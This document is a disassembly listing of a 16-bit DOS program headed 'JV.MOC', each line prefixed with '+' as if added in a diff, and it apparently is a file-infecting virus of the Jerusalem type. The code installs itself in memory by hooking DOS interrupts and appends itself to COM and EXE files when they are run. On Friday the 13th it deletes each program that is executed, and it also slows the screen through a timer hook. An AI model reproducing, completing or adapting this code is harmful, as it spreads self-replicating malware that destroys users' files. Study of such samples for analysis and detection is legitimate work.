+0000:001E  0CFB                      OR      AL,0FBH
+0000:0020  7D00                      JGE     X0022
+0000:0022  0000              X0022:  ADD     [BX+SI],AL
+0000:0024  0000                      ADD     [BX+SI],AL
+0000:0026  0000                      ADD     [BX+SI],AL
+0000:0028  0000                      ADD     [BX+SI],AL
+0000:002A  0000                      ADD     [BX+SI],AL
+0000:002C  0000                      ADD     [BX+SI],AL
+0000:002E  E8062A                    CALL    X2A37
+0000:0031  B10D                      MOV     CL,0DH
+0000:0033  800000                    ADD     BYTE PTR [BX+SI],00H
+0000:0036  008000B1                  ADD     [BX+SI+Y0B100H],AL
+0000:003A  0D5C00                    OR      AX,005CH
+0000:003D  B10D                      MOV     CL,0DH
+0000:003F  6C00                      JL      X0041
+0000:0041  B10D              X0041:  MOV     CL,0DH
+0000:0043  0004                      ADD     [SI],AL
+0000:0045  5F                        POP     DI
+0000:0046  0F                        POP     CS
+0000:0047  B400                      MOV     AH,00H
+0000:0049  C1                        RET                       ; INTRASEGMENT
+0000:004A  0D00F0            X004A:  OR      AX,0F000H
+0000:004D  06                        PUSH    ES
+0000:004E  004D5A                    ADD     [DI+05AH],CL
+0000:0051  2000                      AND     [BX+SI],AL
+0000:0053  1000                      ADC     [BX+SI],AL
+0000:0055  1900                      SBB     [BX+SI],AX
+0000:0057  0800                      OR      [BX+SI],AL
+0000:0059  7500                      JNZ     X005B
+0000:005B  7500              X005B:  JNZ     X005D
+0000:005D  6901              X005D:  JNS     X0060
+0000:005F  1007                      ADC     [BX],AL
+0000:0061  8419                      TEST    BL,[BX+DI]
+0000:0063  C500                      LDS     AX,[BX+SI]
+0000:0065  6901                      JNS     X0068
+0000:0067  1C00                      SBB     AL,00H
+0000:0069  0000                      ADD     [BX+SI],AL
+0000:006B  4C                X006B:  DEC     SP
+0000:006C  B000                      MOV     AL,00H
+0000:006E  CD21                      INT     021H
+0000:0070  050020                    ADD     AX,02000H
+0000:0073  0037                      ADD     [BX],DH
+
+"JV.MOC"                                                              PAGE  0002
+
+0000:0075  121C                      ADC     BL,[SI]
+0000:0077  0100                      ADD     [BX+SI],AX
+0000:0079  0210                      ADD     DL,[BX+SI]
+0000:007B  0010                      ADD     [BX+SI],DL
+0000:007D  17                X007D:  POP     SS
+0000:007E  0000                      ADD     [BX+SI],AL
+0000:0080  53                        PUSH    BX
+0000:0081  61E8                      JNO     X006B
+0000:0083  38434F                    CMP     [BP+DI+04FH],AL
+0000:0086  4D                        DEC     BP
+0000:0087  4D                        DEC     BP
+0000:0088  41                        INC     CX
+0000:0089  4E                        DEC     SI
+0000:008A  44                        INC     SP
+0000:008B  2E43                      INC     BX
+0000:008D  4F                        DEC     DI
+0000:008E  4D                        DEC     BP
+0000:008F  0100                      ADD     [BX+SI],AX
+0000:0091  0000                      ADD     [BX+SI],AL
+0000:0093  0000                      ADD     [BX+SI],AL
+0000:0095  FC                X0095:  CLD     
+0000:0096  B4E0                      MOV     AH,0E0H
+0000:0098  CD21                      INT     021H
+0000:009A  80FCE0                    CMP     AH,0E0H
+0000:009D  7316                      JAE     X00B5
+0000:009F  80FC03                    CMP     AH,03H
+0000:00A2  7211                      JB      X00B5
+0000:00A4  B4DD                      MOV     AH,0DDH
+0000:00A6  BF0001                    MOV     DI,0100H
+0000:00A9  BE1007                    MOV     SI,0710H
+0000:00AC  03F7                      ADD     SI,DI
+0000:00AE  2E8B8D1100                MOV     CX,CS:[DI+Y0011H]
+0000:00B3  CD21                      INT     021H
+0000:00B5  8CC8              X00B5:  MOV     AX,CS
+0000:00B7  051000                    ADD     AX,0010H
+0000:00BA  8ED0                      MOV     SS,AX
+0000:00BC  BC0007                    MOV     SP,0700H
+0000:00BF  50                        PUSH    AX
+0000:00C0  B8C500                    MOV     AX,00C5H
+0000:00C3  50                        PUSH    AX
+0000:00C4  CB                        RET                       ; INTERSEGMENT
+0000:00C5  FC                X00C5:  CLD     
+0000:00C6  06                        PUSH    ES
+0000:00C7  2E8C063100                MOV     CS:[Y0031H],ES
+0000:00CC  2E8C063900                MOV     CS:[Y0039H],ES
+0000:00D1  2E8C063D00                MOV     CS:[Y003DH],ES
+0000:00D6  2E8C064100                MOV     CS:[Y0041H],ES
+0000:00DB  8CC0                      MOV     AX,ES
+0000:00DD  051000                    ADD     AX,0010H
+0000:00E0  2E01064900                ADD     CS:[Y0049H],AX
+0000:00E5  2E01064500                ADD     CS:[Y0045H],AX
+0000:00EA  B4E0                      MOV     AH,0E0H
+0000:00EC  CD21                      INT     021H
+0000:00EE  80FCE0                    CMP     AH,0E0H
+0000:00F1  7313                      JAE     X0106
+0000:00F3  80FC03                    CMP     AH,03H
+
+"JV.MOC"                                                              PAGE  0003
+
+0000:00F6  07                        POP     ES
+0000:00F7  2E8E164500                MOV     SS,CS:[Y0045H]
+0000:00FC  2E8B264300                MOV     SP,CS:[Y0043H]
+0000:0101  2EFF2E4700                JMP     CS:[Y0047H]
+0000:0106  33C0              X0106:  XOR     AX,AX
+0000:0108  8EC0                      MOV     ES,AX
+0000:010A  26A1FC03                  MOV     AX,ES:Y03FCH
+0000:010E  2EA34B00                  MOV     CS:Y004BH,AX
+0000:0112  26A0FE03                  MOV     AL,ES:Y03FEH
+0000:0116  2EA24D00                  MOV     CS:Y004DH,AL
+0000:011A  26C706FC03F3A5            MOV     WORD PTR ES:[Y03FCH],0A5F3H
+0000:0121  26C606FE03CB              MOV     BYTE PTR ES:[Y03FEH],0CBH
+0000:0127  58                        POP     AX
+0000:0128  051000                    ADD     AX,0010H
+0000:012B  8EC0                      MOV     ES,AX
+0000:012D  0E                        PUSH    CS
+0000:012E  1F                        POP     DS
+0000:012F  B91007                    MOV     CX,0710H
+0000:0132  D1E9                      SHR     CX,1
+0000:0134  33F6                      XOR     SI,SI
+0000:0136  8BFE                      MOV     DI,SI
+0000:0138  06                        PUSH    ES
+0000:0139  B84201                    MOV     AX,0142H
+0000:013C  50                        PUSH    AX
+0000:013D  EAFC030000                JMP     X0000_03FC
+0000:0142  8CC8                      MOV     AX,CS
+0000:0144  8ED0                      MOV     SS,AX
+0000:0146  BC0007                    MOV     SP,0700H
+0000:0149  33C0                      XOR     AX,AX
+0000:014B  8ED8                      MOV     DS,AX
+0000:014D  2EA14B00                  MOV     AX,CS:Y004BH
+0000:0151  A3FC03                    MOV     Y03FCH,AX
+0000:0154  2EA04D00                  MOV     AL,CS:Y004DH
+0000:0158  A2FE03                    MOV     Y03FEH,AL
+0000:015B  8BDC                      MOV     BX,SP
+0000:015D  B104                      MOV     CL,04H
+0000:015F  D3EB                      SHR     BX,CL
+0000:0161  83C310                    ADD     BX,0010H
+0000:0164  2E891E3300                MOV     CS:[Y0033H],BX
+0000:0169  B44A                      MOV     AH,04AH
+0000:016B  2E8E063100                MOV     ES,CS:[Y0031H]
+0000:0170  CD21                      INT     021H
+0000:0172  B82135                    MOV     AX,03521H
+0000:0175  CD21                      INT     021H
+0000:0177  2E891E1700                MOV     CS:[Y0017H],BX
+0000:017C  2E8C061900                MOV     CS:[Y0019H],ES
+0000:0181  0E                        PUSH    CS
+0000:0182  1F                        POP     DS
+0000:0183  BA5B02                    MOV     DX,025BH
+0000:0186  B82125                    MOV     AX,02521H
+0000:0189  CD21                      INT     021H
+0000:018B  8E063100                  MOV     ES,[Y0031H]
+0000:018F  268E062C00                MOV     ES,ES:[Y002CH]
+0000:0194  33FF                      XOR     DI,DI
+0000:0196  B9FF7F                    MOV     CX,07FFFH
+0000:0199  32C0                      XOR     AL,AL
+
+"JV.MOC"                                                              PAGE  0004
+
+0000:019B  F2AE              X019B:  REPNE  SCASB   
+0000:019D  263805                    CMP     ES:[DI],AL
+0000:01A0  E0F9                      LOOPNZ  X019B
+0000:01A2  8BD7                      MOV     DX,DI
+0000:01A4  83C203                    ADD     DX,0003H
+0000:01A7  B8004B                    MOV     AX,04B00H
+0000:01AA  06                        PUSH    ES
+0000:01AB  1F                        POP     DS
+0000:01AC  0E                        PUSH    CS
+0000:01AD  07                        POP     ES
+0000:01AE  BB3500                    MOV     BX,0035H
+0000:01B1  1E                        PUSH    DS
+0000:01B2  06                        PUSH    ES
+0000:01B3  50                        PUSH    AX
+0000:01B4  53                        PUSH    BX
+0000:01B5  51                        PUSH    CX
+0000:01B6  52                        PUSH    DX
+0000:01B7  B42A                      MOV     AH,02AH
+0000:01B9  CD21                      INT     021H
+0000:01BB  2EC6060E0000              MOV     BYTE PTR CS:[Y000EH],00H
+0000:01C1  81F9C307                  CMP     CX,07C3H
+0000:01C5  7430                      JZ      X01F7
+0000:01C7  3C05                      CMP     AL,05H
+0000:01C9  750D                      JNZ     X01D8
+0000:01CB  80FA0D                    CMP     DL,0DH
+0000:01CE  7508                      JNZ     X01D8
+0000:01D0  2EFE060E00                INC     BYTE PTR CS:[Y000EH]
+0000:01D5  EB20                      JMP     X01F7
+0000:01D7  90                        NOP     
+0000:01D8  B80835            X01D8:  MOV     AX,03508H
+0000:01DB  CD21                      INT     021H
+0000:01DD  2E891E1300                MOV     CS:[Y0013H],BX
+0000:01E2  2E8C061500                MOV     CS:[Y0015H],ES
+0000:01E7  0E                        PUSH    CS
+0000:01E8  1F                        POP     DS
+0000:01E9  C7061F00907E              MOV     WORD PTR [Y001FH],07E90H
+0000:01EF  B80825                    MOV     AX,02508H
+0000:01F2  BA1E02                    MOV     DX,021EH
+0000:01F5  CD21                      INT     021H
+0000:01F7  5A                X01F7:  POP     DX
+0000:01F8  59                        POP     CX
+0000:01F9  5B                        POP     BX
+0000:01FA  58                        POP     AX
+0000:01FB  07                        POP     ES
+0000:01FC  1F                        POP     DS
+0000:01FD  9C                        PUSHF   
+0000:01FE  2EFF1E1700                CALL    CS:[Y0017H]
+0000:0203  1E                        PUSH    DS
+0000:0204  07                        POP     ES
+0000:0205  B449                      MOV     AH,049H
+0000:0207  CD21                      INT     021H
+0000:0209  B44D                      MOV     AH,04DH
+0000:020B  CD21                      INT     021H
+0000:020D  B431                      MOV     AH,031H
+0000:020F  BA0006                    MOV     DX,0600H
+0000:0212  B104                      MOV     CL,04H
+
+"JV.MOC"                                                              PAGE  0005
+
+0000:0214  D3EA                      SHR     DX,CL
+0000:0216  83C210                    ADD     DX,0010H
+0000:0219  CD21                      INT     021H
+0000:021B  32C0                      XOR     AL,AL
+0000:021D  CF                        IRET    
+0000:021E  2E833E1F0002              CMP     WORD PTR CS:[Y001FH],0002H
+0000:0224  7517                      JNZ     X023D
+0000:0226  50                        PUSH    AX
+0000:0227  53                        PUSH    BX
+0000:0228  51                        PUSH    CX
+0000:0229  52                        PUSH    DX
+0000:022A  55                        PUSH    BP
+0000:022B  B80206                    MOV     AX,0602H
+0000:022E  B787                      MOV     BH,087H
+0000:0230  B90505                    MOV     CX,0505H
+0000:0233  BA1010                    MOV     DX,01010H
+0000:0236  CD10                      INT     010H
+0000:0238  5D                        POP     BP
+0000:0239  5A                        POP     DX
+0000:023A  59                        POP     CX
+0000:023B  5B                        POP     BX
+0000:023C  58                        POP     AX
+0000:023D  2EFF0E1F00        X023D:  DEC     WORD PTR CS:[Y001FH]
+0000:0242  7512                      JNZ     X0256
+0000:0244  2EC7061F000100            MOV     WORD PTR CS:[Y001FH],0001H
+0000:024B  50                        PUSH    AX
+0000:024C  51                        PUSH    CX
+0000:024D  56                        PUSH    SI
+0000:024E  B90140                    MOV     CX,04001H
+0000:0251  F3AC                      REPE  LODSB   
+0000:0253  5E                        POP     SI
+0000:0254  59                        POP     CX
+0000:0255  58                        POP     AX
+0000:0256  2EFF2E1300        X0256:  JMP     CS:[Y0013H]
+0000:025B  9C                X025B:  PUSHF   
+0000:025C  80FCE0                    CMP     AH,0E0H
+0000:025F  7505                      JNZ     X0266
+0000:0261  B80003                    MOV     AX,0300H
+0000:0264  9D                        POPF    
+0000:0265  CF                        IRET    
+0000:0266  80FCDD            X0266:  CMP     AH,0DDH
+0000:0269  7413                      JZ      X027E
+0000:026B  80FCDE                    CMP     AH,0DEH
+0000:026E  7428                      JZ      X0298
+0000:0270  3D004B                    CMP     AX,04B00H
+0000:0273  7503                      JNZ     X0278
+0000:0275  E9B400                    JMP     X032C
+0000:0278  9D                X0278:  POPF    
+0000:0279  2EFF2E1700                JMP     CS:[Y0017H]
+0000:027E  58                X027E:  POP     AX
+0000:027F  58                        POP     AX
+0000:0280  B80001                    MOV     AX,0100H
+0000:0283  2EA30A00                  MOV     CS:Y000AH,AX
+0000:0287  58                        POP     AX
+0000:0288  2EA30C00                  MOV     CS:Y000CH,AX
+0000:028C  F3A4                      REPE  MOVSB   
+
+"JV.MOC"                                                              PAGE  0006
+
+0000:028E  9D                        POPF    
+0000:028F  2EA10F00                  MOV     AX,CS:Y000FH
+0000:0293  2EFF2E0A00                JMP     CS:[Y000AH]
+0000:0298  83C406            X0298:  ADD     SP,0006H
+0000:029B  9D                        POPF    
+0000:029C  8CC8                      MOV     AX,CS
+0000:029E  8ED0                      MOV     SS,AX
+0000:02A0  BC1007                    MOV     SP,0710H
+0000:02A3  06                        PUSH    ES
+0000:02A4  06                        PUSH    ES
+0000:02A5  33FF                      XOR     DI,DI
+0000:02A7  0E                        PUSH    CS
+0000:02A8  07                        POP     ES
+0000:02A9  B91000                    MOV     CX,0010H
+0000:02AC  8BF3                      MOV     SI,BX
+0000:02AE  BF2100                    MOV     DI,0021H
+0000:02B1  F3A4                      REPE  MOVSB   
+0000:02B3  8CD8                      MOV     AX,DS
+0000:02B5  8EC0                      MOV     ES,AX
+0000:02B7  2EF7267A00                MUL     WORD PTR CS:[Y007AH]
+0000:02BC  2E03062B00                ADD     AX,CS:[Y002BH]
+0000:02C1  83D200                    ADC     DX,0000H
+0000:02C4  2EF7367A00                DIV     WORD PTR CS:[Y007AH]
+0000:02C9  8ED8                      MOV     DS,AX
+0000:02CB  8BF2                      MOV     SI,DX
+0000:02CD  8BFA                      MOV     DI,DX
+0000:02CF  8CC5                      MOV     BP,ES
+0000:02D1  2E8B1E2F00                MOV     BX,CS:[Y002FH]
+0000:02D6  0BDB                      OR      BX,BX
+0000:02D8  7413                      JZ      X02ED
+0000:02DA  B90080            X02DA:  MOV     CX,08000H
+0000:02DD  F3A5                      REPE  MOVSW   
+0000:02DF  050010                    ADD     AX,01000H
+0000:02E2  81C50010                  ADD     BP,01000H
+0000:02E6  8ED8                      MOV     DS,AX
+0000:02E8  8EC5                      MOV     ES,BP
+0000:02EA  4B                        DEC     BX
+0000:02EB  75ED                      JNZ     X02DA
+0000:02ED  2E8B0E2D00        X02ED:  MOV     CX,CS:[Y002DH]
+0000:02F2  F3A4                      REPE  MOVSB   
+0000:02F4  58                        POP     AX
+0000:02F5  50                        PUSH    AX
+0000:02F6  051000                    ADD     AX,0010H
+0000:02F9  2E01062900                ADD     CS:[Y0029H],AX
+0000:02FE  2E01062500                ADD     CS:[Y0025H],AX
+0000:0303  2EA12100                  MOV     AX,CS:Y0021H
+0000:0307  1F                        POP     DS
+0000:0308  07                        POP     ES
+0000:0309  2E8E162900                MOV     SS,CS:[Y0029H]
+0000:030E  2E8B262700                MOV     SP,CS:[Y0027H]
+0000:0313  2EFF2E2300                JMP     CS:[Y0023H]
+0000:0318  33C9              X0318:  XOR     CX,CX
+0000:031A  B80143                    MOV     AX,04301H
+0000:031D  CD21                      INT     021H
+0000:031F  B441                      MOV     AH,041H
+0000:0321  CD21                      INT     021H
+
+"JV.MOC"                                                              PAGE  0007
+
+0000:0323  B8004B                    MOV     AX,04B00H
+0000:0326  9D                        POPF    
+0000:0327  2EFF2E1700                JMP     CS:[Y0017H]
+0000:032C  2E803E0E0001      X032C:  CMP     BYTE PTR CS:[Y000EH],01H
+0000:0332  74E4                      JZ      X0318
+0000:0334  2EC7067000FFFF            MOV     WORD PTR CS:[Y0070H],0FFFFH
+0000:033B  2EC7068F000000            MOV     WORD PTR CS:[Y008FH],0000H
+0000:0342  2E89168000                MOV     CS:[Y0080H],DX
+0000:0347  2E8C1E8200                MOV     CS:[Y0082H],DS
+0000:034C  50                        PUSH    AX
+0000:034D  53                        PUSH    BX
+0000:034E  51                        PUSH    CX
+0000:034F  52                        PUSH    DX
+0000:0350  56                        PUSH    SI
+0000:0351  57                        PUSH    DI
+0000:0352  1E                        PUSH    DS
+0000:0353  06                        PUSH    ES
+0000:0354  FC                        CLD     
+0000:0355  8BFA                      MOV     DI,DX
+0000:0357  32D2                      XOR     DL,DL
+0000:0359  807D013A                  CMP     BYTE PTR [DI+01H],03AH
+0000:035D  7505                      JNZ     X0364
+0000:035F  8A15                      MOV     DL,[DI]
+0000:0361  80E21F                    AND     DL,01FH
+0000:0364  B436              X0364:  MOV     AH,036H
+0000:0366  CD21                      INT     021H
+0000:0368  3DFFFF                    CMP     AX,0FFFFH
+0000:036B  7503                      JNZ     X0370
+0000:036D  E97702            X036D:  JMP     X05E7
+0000:0370  F7E3              X0370:  MUL     BX
+0000:0372  F7E1                      MUL     CX
+0000:0374  0BD2                      OR      DX,DX
+0000:0376  7505                      JNZ     X037D
+0000:0378  3D1007                    CMP     AX,0710H
+0000:037B  72F0                      JB      X036D
+0000:037D  2E8B168000        X037D:  MOV     DX,CS:[Y0080H]
+0000:0382  1E                        PUSH    DS
+0000:0383  07                        POP     ES
+0000:0384  32C0                      XOR     AL,AL
+0000:0386  B94100                    MOV     CX,0041H
+0000:0389  F2AE                      REPNE  SCASB   
+0000:038B  2E8B368000                MOV     SI,CS:[Y0080H]
+0000:0390  8A04              X0390:  MOV     AL,[SI]
+0000:0392  0AC0                      OR      AL,AL
+0000:0394  740E                      JZ      X03A4
+0000:0396  3C61                      CMP     AL,061H
+0000:0398  7207                      JB      X03A1
+0000:039A  3C7A                      CMP     AL,07AH
+0000:039C  7703                      JA      X03A1
+0000:039E  802C20                    SUB     BYTE PTR [SI],020H
+0000:03A1  46                X03A1:  INC     SI
+0000:03A2  EBEC                      JMP     X0390
+0000:03A4  B90B00            X03A4:  MOV     CX,000BH
+0000:03A7  2BF1                      SUB     SI,CX
+0000:03A9  BF8400                    MOV     DI,0084H
+0000:03AC  0E                        PUSH    CS
+
+"JV.MOC"                                                              PAGE  0008
+
+0000:03AD  07                        POP     ES
+0000:03AE  B90B00                    MOV     CX,000BH
+0000:03B1  F3A6                      REPE  CMPSB   
+0000:03B3  7503                      JNZ     X03B8
+0000:03B5  E92F02                    JMP     X05E7
+0000:03B8  B80043            X03B8:  MOV     AX,04300H
+0000:03BB  CD21                      INT     021H
+0000:03BD  7205                      JB      X03C4
+0000:03BF  2E890E7200                MOV     CS:[Y0072H],CX
+0000:03C4  7225              X03C4:  JB      X03EB
+0000:03C6  32C0                      XOR     AL,AL
+0000:03C8  2EA24E00                  MOV     CS:Y004EH,AL
+0000:03CC  1E                        PUSH    DS
+0000:03CD  07                        POP     ES
+0000:03CE  8BFA                      MOV     DI,DX
+0000:03D0  B94100                    MOV     CX,0041H
+0000:03D3  F2AE                      REPNE  SCASB   
+0000:03D5  807DFE4D                  CMP     BYTE PTR [DI-02H],04DH
+0000:03D9  740B                      JZ      X03E6
+0000:03DB  807DFE6D                  CMP     BYTE PTR [DI-02H],06DH
+0000:03DF  7405                      JZ      X03E6
+0000:03E1  2EFE064E00                INC     BYTE PTR CS:[Y004EH]
+0000:03E6  B8003D            X03E6:  MOV     AX,03D00H
+0000:03E9  CD21                      INT     021H
+0000:03EB  725A              X03EB:  JB      X0447
+0000:03ED  2EA37000                  MOV     CS:Y0070H,AX
+0000:03F1  8BD8                      MOV     BX,AX
+0000:03F3  B80242                    MOV     AX,04202H
+0000:03F6  B9FFFF                    MOV     CX,0FFFFH
+0000:03F9  BAFBFF                    MOV     DX,0FFFBH
+0000:03FC  CD21              X03FC:  INT     021H
+0000:03FE  72EB                      JB      X03EB
+0000:0400  050500                    ADD     AX,0005H
+0000:0403  2EA31100                  MOV     CS:Y0011H,AX
+0000:0407  B90500                    MOV     CX,0005H
+0000:040A  BA6B00                    MOV     DX,006BH
+0000:040D  8CC8                      MOV     AX,CS
+0000:040F  8ED8                      MOV     DS,AX
+0000:0411  8EC0                      MOV     ES,AX
+0000:0413  B43F                      MOV     AH,03FH
+0000:0415  CD21                      INT     021H
+0000:0417  8BFA                      MOV     DI,DX
+0000:0419  BE0500                    MOV     SI,0005H
+0000:041C  F3A6                      REPE  CMPSB   
+0000:041E  7507                      JNZ     X0427
+0000:0420  B43E                      MOV     AH,03EH
+0000:0422  CD21                      INT     021H
+0000:0424  E9C001                    JMP     X05E7
+0000:0427  B82435            X0427:  MOV     AX,03524H
+0000:042A  CD21                      INT     021H
+0000:042C  891E1B00                  MOV     [Y001BH],BX
+0000:0430  8C061D00                  MOV     [Y001DH],ES
+0000:0434  BA1B02                    MOV     DX,021BH
+0000:0437  B82425                    MOV     AX,02524H
+0000:043A  CD21                      INT     021H
+0000:043C  C5168000                  LDS     DX,[Y0080H]
+
+"JV.MOC"                                                              PAGE  0009
+
+0000:0440  33C9                      XOR     CX,CX
+0000:0442  B80143                    MOV     AX,04301H
+0000:0445  CD21                      INT     021H
+0000:0447  723B              X0447:  JB      X0484
+0000:0449  2E8B1E7000                MOV     BX,CS:[Y0070H]
+0000:044E  B43E                      MOV     AH,03EH
+0000:0450  CD21                      INT     021H
+0000:0452  2EC7067000FFFF            MOV     WORD PTR CS:[Y0070H],0FFFFH
+0000:0459  B8023D                    MOV     AX,03D02H
+0000:045C  CD21                      INT     021H
+0000:045E  7224                      JB      X0484
+0000:0460  2EA37000                  MOV     CS:Y0070H,AX
+0000:0464  8CC8                      MOV     AX,CS
+0000:0466  8ED8                      MOV     DS,AX
+0000:0468  8EC0                      MOV     ES,AX
+0000:046A  8B1E7000                  MOV     BX,[Y0070H]
+0000:046E  B80057                    MOV     AX,05700H
+0000:0471  CD21                      INT     021H
+0000:0473  89167400                  MOV     [Y0074H],DX
+0000:0477  890E7600                  MOV     [Y0076H],CX
+0000:047B  B80042                    MOV     AX,04200H
+0000:047E  33C9                      XOR     CX,CX
+0000:0480  8BD1                      MOV     DX,CX
+0000:0482  CD21                      INT     021H
+0000:0484  723D              X0484:  JB      X04C3
+0000:0486  803E4E0000                CMP     BYTE PTR [Y004EH],00H
+0000:048B  7403                      JZ      X0490
+0000:048D  EB57                      JMP     X04E6
+0000:048F  90                        NOP     
+0000:0490  BB0010            X0490:  MOV     BX,01000H
+0000:0493  B448                      MOV     AH,048H
+0000:0495  CD21                      INT     021H
+0000:0497  730B                      JAE     X04A4
+0000:0499  B43E                      MOV     AH,03EH
+0000:049B  8B1E7000                  MOV     BX,[Y0070H]
+0000:049F  CD21                      INT     021H
+0000:04A1  E94301                    JMP     X05E7
+0000:04A4  FF068F00          X04A4:  INC     WORD PTR [Y008FH]
+0000:04A8  8EC0                      MOV     ES,AX
+0000:04AA  33F6                      XOR     SI,SI
+0000:04AC  8BFE                      MOV     DI,SI
+0000:04AE  B91007                    MOV     CX,0710H
+0000:04B1  F3A4                      REPE  MOVSB   
+0000:04B3  8BD7                      MOV     DX,DI
+0000:04B5  8B0E1100                  MOV     CX,[Y0011H]
+0000:04B9  8B1E7000                  MOV     BX,[Y0070H]
+0000:04BD  06                        PUSH    ES
+0000:04BE  1F                        POP     DS
+0000:04BF  B43F                      MOV     AH,03FH
+0000:04C1  CD21                      INT     021H
+0000:04C3  721C              X04C3:  JB      X04E1
+0000:04C5  03F9                      ADD     DI,CX
+0000:04C7  33C9                      XOR     CX,CX
+0000:04C9  8BD1                      MOV     DX,CX
+0000:04CB  B80042                    MOV     AX,04200H
+0000:04CE  CD21                      INT     021H
+
+"JV.MOC"                                                              PAGE  0010
+
+0000:04D0  BE0500                    MOV     SI,0005H
+0000:04D3  B90500                    MOV     CX,0005H
+0000:04D6  F32EA4                    REPE  MOVS    ES:BYTE PTR (DI),CS:BYTE PT
+                                                   R (SI)
+0000:04D9  8BCF                      MOV     CX,DI
+0000:04DB  33D2                      XOR     DX,DX
+0000:04DD  B440                      MOV     AH,040H
+0000:04DF  CD21                      INT     021H
+0000:04E1  720D              X04E1:  JB      X04F0
+0000:04E3  E9BC00                    JMP     X05A2
+0000:04E6  B91C00            X04E6:  MOV     CX,001CH
+0000:04E9  BA4F00                    MOV     DX,004FH
+0000:04EC  B43F                      MOV     AH,03FH
+0000:04EE  CD21                      INT     021H
+0000:04F0  724A              X04F0:  JB      X053C
+0000:04F2  C70661008419              MOV     WORD PTR [Y0061H],01984H
+0000:04F8  A15D00                    MOV     AX,Y005DH
+0000:04FB  A34500                    MOV     Y0045H,AX
+0000:04FE  A15F00                    MOV     AX,Y005FH
+0000:0501  A34300                    MOV     Y0043H,AX
+0000:0504  A16300                    MOV     AX,Y0063H
+0000:0507  A34700                    MOV     Y0047H,AX
+0000:050A  A16500                    MOV     AX,Y0065H
+0000:050D  A34900                    MOV     Y0049H,AX
+0000:0510  A15300                    MOV     AX,Y0053H
+0000:0513  833E510000                CMP     WORD PTR [Y0051H],0000H
+0000:0518  7401                      JZ      X051B
+0000:051A  48                        DEC     AX
+0000:051B  F7267800          X051B:  MUL     WORD PTR [Y0078H]
+0000:051F  03065100                  ADD     AX,[Y0051H]
+0000:0523  83D200                    ADC     DX,0000H
+0000:0526  050F00                    ADD     AX,000FH
+0000:0529  83D200                    ADC     DX,0000H
+0000:052C  25F0FF                    AND     AX,0FFF0H
+0000:052F  A37C00                    MOV     Y007CH,AX
+0000:0532  89167E00                  MOV     [Y007EH],DX
+0000:0536  051007                    ADD     AX,0710H
+0000:0539  83D200                    ADC     DX,0000H
+0000:053C  723A              X053C:  JB      X0578
+0000:053E  F7367800                  DIV     WORD PTR [Y0078H]
+0000:0542  0BD2                      OR      DX,DX
+0000:0544  7401                      JZ      X0547
+0000:0546  40                        INC     AX
+0000:0547  A35300            X0547:  MOV     Y0053H,AX
+0000:054A  89165100                  MOV     [Y0051H],DX
+0000:054E  A17C00                    MOV     AX,Y007CH
+0000:0551  8B167E00                  MOV     DX,[Y007EH]
+0000:0555  F7367A00                  DIV     WORD PTR [Y007AH]
+0000:0559  2B065700                  SUB     AX,[Y0057H]
+0000:055D  A36500                    MOV     Y0065H,AX
+0000:0560  C7066300C500              MOV     WORD PTR [Y0063H],00C5H
+0000:0566  A35D00                    MOV     Y005DH,AX
+0000:0569  C7065F001007              MOV     WORD PTR [Y005FH],0710H
+0000:056F  33C9                      XOR     CX,CX
+0000:0571  8BD1                      MOV     DX,CX
+0000:0573  B80042                    MOV     AX,04200H
+0000:0576  CD21                      INT     021H
+
+"JV.MOC"                                                              PAGE  0011
+
+0000:0578  720A              X0578:  JB      X0584
+0000:057A  B91C00                    MOV     CX,001CH
+0000:057D  BA4F00                    MOV     DX,004FH
+0000:0580  B440                      MOV     AH,040H
+0000:0582  CD21                      INT     021H
+0000:0584  7211              X0584:  JB      X0597
+0000:0586  3BC1                      CMP     AX,CX
+0000:0588  7518                      JNZ     X05A2
+0000:058A  8B167C00                  MOV     DX,[Y007CH]
+0000:058E  8B0E7E00                  MOV     CX,[Y007EH]
+0000:0592  B80042                    MOV     AX,04200H
+0000:0595  CD21                      INT     021H
+0000:0597  7209              X0597:  JB      X05A2
+0000:0599  33D2                      XOR     DX,DX
+0000:059B  B91007                    MOV     CX,0710H
+0000:059E  B440                      MOV     AH,040H
+0000:05A0  CD21                      INT     021H
+0000:05A2  2E833E8F0000      X05A2:  CMP     WORD PTR CS:[Y008FH],0000H
+0000:05A8  7404                      JZ      X05AE
+0000:05AA  B449                      MOV     AH,049H
+0000:05AC  CD21                      INT     021H
+0000:05AE  2E833E7000FF      X05AE:  CMP     WORD PTR CS:[Y0070H],0FFFFH
+0000:05B4  7431                      JZ      X05E7
+0000:05B6  2E8B1E7000                MOV     BX,CS:[Y0070H]
+0000:05BB  2E8B167400                MOV     DX,CS:[Y0074H]
+0000:05C0  2E8B0E7600                MOV     CX,CS:[Y0076H]
+0000:05C5  B80157                    MOV     AX,05701H
+0000:05C8  CD21                      INT     021H
+0000:05CA  B43E                      MOV     AH,03EH
+0000:05CC  CD21                      INT     021H
+0000:05CE  2EC5168000                LDS     DX,CS:[Y0080H]
+0000:05D3  2E8B0E7200                MOV     CX,CS:[Y0072H]
+0000:05D8  B80143                    MOV     AX,04301H
+0000:05DB  CD21                      INT     021H
+0000:05DD  2EC5161B00                LDS     DX,CS:[Y001BH]
+0000:05E2  B82425                    MOV     AX,02524H
+0000:05E5  CD21                      INT     021H
+0000:05E7  07                X05E7:  POP     ES
+0000:05E8  1F                        POP     DS
+0000:05E9  5F                        POP     DI
+0000:05EA  5E                        POP     SI
+0000:05EB  5A                        POP     DX
+0000:05EC  59                        POP     CX
+0000:05ED  5B                        POP     BX
+0000:05EE  58                        POP     AX
+0000:05EF  9D                        POPF    
+0000:05F0  2EFF2E1700                JMP     CS:[Y0017H]
+0000:05F5  0000              X05F5:  ADD     [BX+SI],AL
+0000:05F7  0000                      ADD     [BX+SI],AL
+0000:05F9  0000                      ADD     [BX+SI],AL
+0000:05FB  0000                      ADD     [BX+SI],AL
+0000:05FD  0000                      ADD     [BX+SI],AL
+0000:05FF  004D00                    ADD     [DI+00H],CL
+0000:0602  000F                      ADD     [BX],CL
+0000:0604  0000                      ADD     [BX+SI],AL
+0000:0606  0000                      ADD     [BX+SI],AL
+
+"JV.MOC"                                                              PAGE  0012
+
+0000:0608  0000                      ADD     [BX+SI],AL
+0000:060A  0000                      ADD     [BX+SI],AL
+0000:060C  0000                      ADD     [BX+SI],AL
+0000:060E  0000                      ADD     [BX+SI],AL
+0000:0610  CD20                      INT     020H
+0000:0612  00A0009A                  ADD     [BX+SI+Y09A00H],AH
+0000:0616  F0FE1D                    LOCK  CALL    [DI]        ; NOT VALID
+0000:0619  F02F                      LOCK  DAS     
+0000:061B  018E1E3C                  ADD     [BP+Y03C1EH],CX
